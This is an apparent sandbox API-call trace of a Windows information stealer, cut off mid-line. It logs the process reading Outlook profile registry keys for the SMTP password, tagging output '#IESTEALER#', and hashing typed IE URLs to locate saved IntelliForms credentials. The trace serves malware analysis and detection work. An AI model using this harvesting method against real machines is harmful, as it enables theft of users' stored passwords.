RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.326] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.326] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.326] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.326] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.326] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] LocalFree (hMem=0x5d66960) returned 0x0 [0249.326] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0xe, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.326] RegCloseKey (hKey=0x94c) returned 0x0 [0249.327] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x0, dwOrigin=0x1, plibNewPosition=0x1c4f768 | out: plibNewPosition=0x1c4f768) returned 0x0 [0249.327] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x0, dwOrigin=0x1, plibNewPosition=0x1c4f778 | out: plibNewPosition=0x1c4f778) returned 0x0 [0249.327] lstrlenA (lpString="#IESTEALER#\n") returned 12 [0249.327] ISequentialStream:RemoteWrite (in: This=0xd1ee010, pv=0x74c9c88*=0x23, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0249.327] LocalAlloc (uFlags=0x40, uBytes=0x484) returned 0x3761a0 [0249.328] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegOpenKeyExW") returned 0x7ff976f96cb0 [0249.328] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\TypedURLs", ulOptions=0x0, samDesired=0x1, phkResult=0x1c4f4d0 | out: phkResult=0x1c4f4d0*=0x94c) returned 0x0 [0249.328] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x43ed4e0 [0249.328] RegEnumValueW (in: hKey=0x94c, dwIndex=0x0, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url23", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.328] StrStrIW (lpFirst="accuweather.com", lpSrch="?") returned 0x0 [0249.328] StrStrIW (lpFirst="accuweather.com", lpSrch="http://") returned 0x0 [0249.328] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptAcquireContextW") returned 0x7ff976f989e0 [0249.328] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d36f10) returned 1 [0249.329] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptCreateHash") returned 0x7ff976f97bf0 [0249.329] CryptCreateHash (in: hProv=0x5d36f10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.330] lstrlenW (lpString="accuweather.com") returned 15 [0249.330] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptHashData") returned 0x7ff976f97d80 [0249.330] CryptHashData (hHash=0x5d9d8a0, pbData=0x43ed4e0, dwDataLen=0x20, dwFlags=0x0) returned 1 [0249.331] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptGetHashParam") returned 0x7ff976f97970 [0249.331] CryptGetHashParam (in: hHash=0x5d9d8a0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.331] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="3F") returned 2 [0249.331] lstrlenW (lpString="") returned 0 [0249.331] lstrlenW (lpString="3F") returned 2 [0249.331] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3f50 [0249.331] lstrcpyW (in: lpString1=0xd1b3f50, lpString2="" | out: lpString1="") returned="" [0249.331] lstrcatW (in: lpString1="", lpString2="3F" | out: lpString1="3F") returned="3F" [0249.331] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="99") returned 2 [0249.331] lstrlenW (lpString="3F") returned 2 [0249.331] lstrlenW (lpString="99") returned 2 [0249.331] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.331] lstrcpyW (in: lpString1=0x5d33770, lpString2="3F" | out: lpString1="3F") returned="3F" [0249.331] lstrcatW (in: lpString1="3F", lpString2="99" | out: lpString1="3F99") returned="3F99" [0249.331] LocalFree (hMem=0xd1b3f50) returned 0x0 [0249.331] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="09") returned 2 [0249.331] lstrlenW (lpString="3F99") returned 4 [0249.331] lstrlenW (lpString="09") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.332] lstrcpyW (in: lpString1=0x5d33950, lpString2="3F99" | out: lpString1="3F99") returned="3F99" [0249.332] lstrcatW (in: lpString1="3F99", lpString2="09" | out: lpString1="3F9909") returned="3F9909" [0249.332] LocalFree (hMem=0x5d33770) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EE") returned 2 [0249.332] lstrlenW (lpString="3F9909") returned 6 [0249.332] lstrlenW (lpString="EE") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.332] lstrcpyW (in: lpString1=0x5d33770, lpString2="3F9909" | out: lpString1="3F9909") returned="3F9909" [0249.332] lstrcatW (in: lpString1="3F9909", lpString2="EE" | out: lpString1="3F9909EE") returned="3F9909EE" [0249.332] LocalFree (hMem=0x5d33950) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="97") returned 2 [0249.332] lstrlenW (lpString="3F9909EE") returned 8 [0249.332] lstrlenW (lpString="97") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33db0 [0249.332] lstrcpyW (in: lpString1=0x5d33db0, lpString2="3F9909EE" | out: lpString1="3F9909EE") returned="3F9909EE" [0249.332] lstrcatW (in: lpString1="3F9909EE", lpString2="97" | out: lpString1="3F9909EE97") returned="3F9909EE97" [0249.332] LocalFree (hMem=0x5d33770) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="43") returned 2 [0249.332] lstrlenW (lpString="3F9909EE97") returned 10 [0249.332] lstrlenW (lpString="43") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cf730 [0249.332] lstrcpyW (in: lpString1=0xd1cf730, lpString2="3F9909EE97" | out: lpString1="3F9909EE97") returned="3F9909EE97" [0249.332] lstrcatW (in: lpString1="3F9909EE97", lpString2="43" | out: lpString1="3F9909EE9743") returned="3F9909EE9743" [0249.332] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4A") returned 2 [0249.332] lstrlenW (lpString="3F9909EE9743") returned 12 [0249.332] lstrlenW (lpString="4A") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d05a0 [0249.332] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="3F9909EE9743" | out: lpString1="3F9909EE9743") returned="3F9909EE9743" [0249.332] lstrcatW (in: lpString1="3F9909EE9743", lpString2="4A" | out: lpString1="3F9909EE97434A") returned="3F9909EE97434A" [0249.332] LocalFree (hMem=0xd1cf730) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="20") returned 2 [0249.332] lstrlenW (lpString="3F9909EE97434A") returned 14 [0249.332] lstrlenW (lpString="20") returned 2 [0249.332] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cff70 [0249.332] lstrcpyW (in: lpString1=0xd1cff70, lpString2="3F9909EE97434A" | out: lpString1="3F9909EE97434A") returned="3F9909EE97434A" [0249.332] lstrcatW (in: lpString1="3F9909EE97434A", lpString2="20" | out: lpString1="3F9909EE97434A20") returned="3F9909EE97434A20" [0249.332] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.332] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D3") returned 2 [0249.332] lstrlenW (lpString="3F9909EE97434A20") returned 16 [0249.332] lstrlenW (lpString="D3") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cfcb0 [0249.333] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="3F9909EE97434A20" | out: lpString1="3F9909EE97434A20") returned="3F9909EE97434A20" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20", lpString2="D3" | out: lpString1="3F9909EE97434A20D3") returned="3F9909EE97434A20D3" [0249.333] LocalFree (hMem=0xd1cff70) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6A") returned 2 [0249.333] lstrlenW (lpString="3F9909EE97434A20D3") returned 18 [0249.333] lstrlenW (lpString="6A") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217570 [0249.333] lstrcpyW (in: lpString1=0xd217570, lpString2="3F9909EE97434A20D3" | out: lpString1="3F9909EE97434A20D3") returned="3F9909EE97434A20D3" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20D3", lpString2="6A" | out: lpString1="3F9909EE97434A20D36A") returned="3F9909EE97434A20D36A" [0249.333] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6D") returned 2 [0249.333] lstrlenW (lpString="3F9909EE97434A20D36A") returned 20 [0249.333] lstrlenW (lpString="6D") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2167f0 [0249.333] lstrcpyW (in: lpString1=0xd2167f0, lpString2="3F9909EE97434A20D36A" | out: lpString1="3F9909EE97434A20D36A") returned="3F9909EE97434A20D36A" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20D36A", lpString2="6D" | out: lpString1="3F9909EE97434A20D36A6D") returned="3F9909EE97434A20D36A6D" [0249.333] LocalFree (hMem=0xd217570) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="08") returned 2 [0249.333] lstrlenW (lpString="3F9909EE97434A20D36A6D") returned 22 [0249.333] lstrlenW (lpString="08") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd216df0 [0249.333] lstrcpyW (in: lpString1=0xd216df0, lpString2="3F9909EE97434A20D36A6D" | out: lpString1="3F9909EE97434A20D36A6D") returned="3F9909EE97434A20D36A6D" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D", lpString2="08" | out: lpString1="3F9909EE97434A20D36A6D08") returned="3F9909EE97434A20D36A6D08" [0249.333] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EC") returned 2 [0249.333] lstrlenW (lpString="3F9909EE97434A20D36A6D08") returned 24 [0249.333] lstrlenW (lpString="EC") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2177b0 [0249.333] lstrcpyW (in: lpString1=0xd2177b0, lpString2="3F9909EE97434A20D36A6D08" | out: lpString1="3F9909EE97434A20D36A6D08") returned="3F9909EE97434A20D36A6D08" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08", lpString2="EC" | out: lpString1="3F9909EE97434A20D36A6D08EC") returned="3F9909EE97434A20D36A6D08EC" [0249.333] LocalFree (hMem=0xd216df0) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8A") returned 2 [0249.333] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC") returned 26 [0249.333] lstrlenW (lpString="8A") returned 2 [0249.333] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214f50 [0249.333] lstrcpyW (in: lpString1=0xd214f50, lpString2="3F9909EE97434A20D36A6D08EC" | out: lpString1="3F9909EE97434A20D36A6D08EC") returned="3F9909EE97434A20D36A6D08EC" [0249.333] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC", lpString2="8A" | out: lpString1="3F9909EE97434A20D36A6D08EC8A") returned="3F9909EE97434A20D36A6D08EC8A" [0249.333] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.333] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2D") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A") returned 28 [0249.334] lstrlenW (lpString="2D") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215df0 [0249.334] lstrcpyW (in: lpString1=0xd215df0, lpString2="3F9909EE97434A20D36A6D08EC8A" | out: lpString1="3F9909EE97434A20D36A6D08EC8A") returned="3F9909EE97434A20D36A6D08EC8A" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A", lpString2="2D" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2D") returned="3F9909EE97434A20D36A6D08EC8A2D" [0249.334] LocalFree (hMem=0xd214f50) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D3") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2D") returned 30 [0249.334] lstrlenW (lpString="D3") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214f50 [0249.334] lstrcpyW (in: lpString1=0xd214f50, lpString2="3F9909EE97434A20D36A6D08EC8A2D" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2D") returned="3F9909EE97434A20D36A6D08EC8A2D" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2D", lpString2="D3" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD3") returned="3F9909EE97434A20D36A6D08EC8A2DD3" [0249.334] LocalFree (hMem=0xd215df0) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1C") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2DD3") returned 32 [0249.334] lstrlenW (lpString="1C") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215360 [0249.334] lstrcpyW (in: lpString1=0xd215360, lpString2="3F9909EE97434A20D36A6D08EC8A2DD3" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD3") returned="3F9909EE97434A20D36A6D08EC8A2DD3" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2DD3", lpString2="1C" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31C") returned="3F9909EE97434A20D36A6D08EC8A2DD31C" [0249.334] LocalFree (hMem=0xd214f50) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D5") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2DD31C") returned 34 [0249.334] lstrlenW (lpString="D5") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67220 [0249.334] lstrcpyW (in: lpString1=0x5d67220, lpString2="3F9909EE97434A20D36A6D08EC8A2DD31C" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31C") returned="3F9909EE97434A20D36A6D08EC8A2DD31C" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31C", lpString2="D5" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5" [0249.334] LocalFree (hMem=0xd215360) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E9") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2DD31CD5") returned 36 [0249.334] lstrlenW (lpString="E9") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67840 [0249.334] lstrcpyW (in: lpString1=0x5d67840, lpString2="3F9909EE97434A20D36A6D08EC8A2DD31CD5" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5", lpString2="E9" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9" [0249.334] LocalFree (hMem=0x5d67220) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="15") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9") returned 38 [0249.334] lstrlenW (lpString="15") returned 2 [0249.334] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66ce0 [0249.334] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9" [0249.334] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9", lpString2="15" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915" [0249.334] LocalFree (hMem=0x5d67840) returned 0x0 [0249.334] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2A") returned 2 [0249.334] lstrlenW (lpString="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915") returned 40 [0249.334] lstrlenW (lpString="2A") returned 2 [0249.335] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67e60 [0249.335] lstrcpyW (in: lpString1=0x5d67e60, lpString2="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915" [0249.335] lstrcatW (in: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E915", lpString2="2A" | out: lpString1="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9152A") returned="3F9909EE97434A20D36A6D08EC8A2DD31CD5E9152A" [0249.335] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.335] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptDestroyHash") returned 0x7ff976f986a0 [0249.335] CryptDestroyHash (hHash=0x5d9d8a0) returned 1 [0249.335] GetProcAddress (hModule=0x7ff976f80000, lpProcName="CryptReleaseContext") returned 0x7ff976f98ee0 [0249.336] CryptReleaseContext (hProv=0x5d36f10, dwFlags=0x0) returned 1 [0249.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.336] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.336] RegEnumValueW (in: hKey=0x94c, dwIndex=0x1, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url22", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.336] StrStrIW (lpFirst="tianya.cn", lpSrch="?") returned 0x0 [0249.336] StrStrIW (lpFirst="tianya.cn", lpSrch="http://") returned 0x0 [0249.336] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d36e10) returned 1 [0249.336] CryptCreateHash (in: hProv=0x5d36e10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.336] lstrlenW (lpString="tianya.cn") returned 9 [0249.336] CryptHashData (hHash=0x5d9e550, pbData=0x43ed4e0, dwDataLen=0x14, dwFlags=0x0) returned 1 [0249.336] CryptGetHashParam (in: hHash=0x5d9e550, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="52") returned 2 [0249.337] lstrlenW (lpString="") returned 0 [0249.337] lstrlenW (lpString="52") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b4610 [0249.337] lstrcpyW (in: lpString1=0xd1b4610, lpString2="" | out: lpString1="") returned="" [0249.337] lstrcatW (in: lpString1="", lpString2="52" | out: lpString1="52") returned="52" [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C2") returned 2 [0249.337] lstrlenW (lpString="52") returned 2 [0249.337] lstrlenW (lpString="C2") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.337] lstrcpyW (in: lpString1=0x5d33770, lpString2="52" | out: lpString1="52") returned="52" [0249.337] lstrcatW (in: lpString1="52", lpString2="C2" | out: lpString1="52C2") returned="52C2" [0249.337] LocalFree (hMem=0xd1b4610) returned 0x0 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AA") returned 2 [0249.337] lstrlenW (lpString="52C2") returned 4 [0249.337] lstrlenW (lpString="AA") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.337] lstrcpyW (in: lpString1=0x5d33950, lpString2="52C2" | out: lpString1="52C2") returned="52C2" [0249.337] lstrcatW (in: lpString1="52C2", lpString2="AA" | out: lpString1="52C2AA") returned="52C2AA" [0249.337] LocalFree (hMem=0x5d33770) returned 0x0 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="94") returned 2 [0249.337] lstrlenW (lpString="52C2AA") returned 6 [0249.337] lstrlenW (lpString="94") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.337] lstrcpyW (in: lpString1=0x5d33db0, lpString2="52C2AA" | out: lpString1="52C2AA") returned="52C2AA" [0249.337] lstrcatW (in: lpString1="52C2AA", lpString2="94" | out: lpString1="52C2AA94") returned="52C2AA94" [0249.337] LocalFree (hMem=0x5d33950) returned 0x0 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2C") returned 2 [0249.337] lstrlenW (lpString="52C2AA94") returned 8 [0249.337] lstrlenW (lpString="2C") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33770 [0249.337] lstrcpyW (in: lpString1=0x5d33770, lpString2="52C2AA94" | out: lpString1="52C2AA94") returned="52C2AA94" [0249.337] lstrcatW (in: lpString1="52C2AA94", lpString2="2C" | out: lpString1="52C2AA942C") returned="52C2AA942C" [0249.337] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9E") returned 2 [0249.337] lstrlenW (lpString="52C2AA942C") returned 10 [0249.337] lstrlenW (lpString="9E") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0650 [0249.337] lstrcpyW (in: lpString1=0xd1d0650, lpString2="52C2AA942C" | out: lpString1="52C2AA942C") returned="52C2AA942C" [0249.337] lstrcatW (in: lpString1="52C2AA942C", lpString2="9E" | out: lpString1="52C2AA942C9E") returned="52C2AA942C9E" [0249.337] LocalFree (hMem=0x5d33770) 